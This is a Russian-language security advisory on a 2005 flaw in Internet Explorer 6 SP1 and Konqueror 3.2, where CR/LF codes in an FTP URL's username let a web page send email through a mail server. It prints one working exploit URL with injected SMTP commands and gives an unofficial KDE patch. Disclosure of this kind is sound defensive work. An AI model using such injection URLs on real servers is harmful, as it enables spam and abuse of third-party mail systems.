Неавторизованная рассылка email сообщений с помощью Internet Explorer

Дата публикации:
03.01.2005
Всего просмотров:
1779
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Internet Explorer version 6 SP1, Konqueror version 3.2

Описание: Internet Explorer и Konqueror могут использоваться для неавторизованной отправки почтового сообщения через встроенный FTP клиент без какого либо взаимодействия с пользователем.

Internet Explorer и Konqueror могут принимать %0a и %0d в URL. В FTP URL эти коды используются в имени пользователя. Благодаря сходству между FTP и SMTP протоколами, уязвимость может использоваться для отправки почтовых сообщений.

Спамеры могут создать на Web сайте специально обработанное изображение, которое пошлет множество email сообщений при попытке просмотреть это изображение.

Пример/Эксплоит:

ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a<ian-example%
40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3a ian%
40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net:25
Демонстрация: http://dsbl.org/testingground/IE-FTP-SMTP-link/

URL производителя: http://www.Microsoft.com, http://www.konqueror.org/

Решение: Неофициальный патч для KDE:

--- kdelibs-3.2.3/kioslave/ftp/ftp.cc 2004-02-15 16:15:27.000000000 -0500
+++ kdelibs-3.2.3-ftp-fixed/kioslave/ftp/ftp.cc 2004-12-25 00:44:27.000000000 -0500
@@ -652,6 +652,9 @@
 {
   assert( sControl > 0 );
 
+  if (cmd.find('\r') != -1 || cmd.find('\n') != -1)
+   return false;
+
   QCString buf = cmd;
   buf += "\r\n";

или введите имя

CAPTCHA